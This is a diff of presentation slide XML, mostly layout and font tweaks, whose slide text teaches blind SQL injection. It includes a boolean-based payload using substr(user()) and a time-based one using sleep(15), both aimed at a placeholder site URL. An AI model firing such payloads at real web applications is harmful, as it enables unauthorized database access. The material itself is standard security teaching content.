             <a:off x="3197160" y="4775760"/>
-            <a:ext cx="6123960" cy="330840"/>
+            <a:ext cx="6123600" cy="330480"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6877,6 +7137,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>site.com/products?id=1'+and+substr(user(),1,1)+=+'a</a:t>
             </a:r>
@@ -6895,7 +7156,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="2646000" y="3922560"/>
-            <a:ext cx="7315200" cy="365760"/>
+            <a:ext cx="7314840" cy="365400"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6927,17 +7188,9 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Use these conditions to extract </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>information from the database.</a:t>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>Use these conditions to extract information from the database.</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
@@ -6984,7 +7237,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="2405520" y="3615840"/>
-            <a:ext cx="7979400" cy="463680"/>
+            <a:ext cx="7979040" cy="463320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7016,6 +7269,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>site.com/products?id=1+and+if(mid(version(),1,1)+=+'5',+sleep(15),0) </a:t>
             </a:r>
@@ -7034,7 +7288,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="2742840" y="1661040"/>
-            <a:ext cx="7315200" cy="731520"/>
+            <a:ext cx="7314840" cy="731160"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7066,6 +7320,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>Used when there is no visual feedback.</a:t>
             </a:r>
@@ -7076,6 +7331,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>Uses the true/false condition, by triggering a long wait for true, and false returns instantly.</a:t>
             </a:r>
@@ -7094,7 +7350,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="2773080" y="4942800"/>
-            <a:ext cx="7498440" cy="463680"/>
+            <a:ext cx="7498080" cy="463320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7126,6 +7382,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>Both Blind SQL techniques are quite slow to extract information.</a:t>
             </a:r>
@@ -7144,7 +7401,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="182880" y="182880"/>
-            <a:ext cx="1671120" cy="363960"/>
+            <a:ext cx="1670760" cy="363600"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7195,7 +7452,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="5212080" y="914400"/>
-            <a:ext cx="2011320" cy="330840"/>
+            <a:ext cx="2010960" cy="330480"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -7227,6 +7484,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>Time based blind</a:t>
             </a:r>
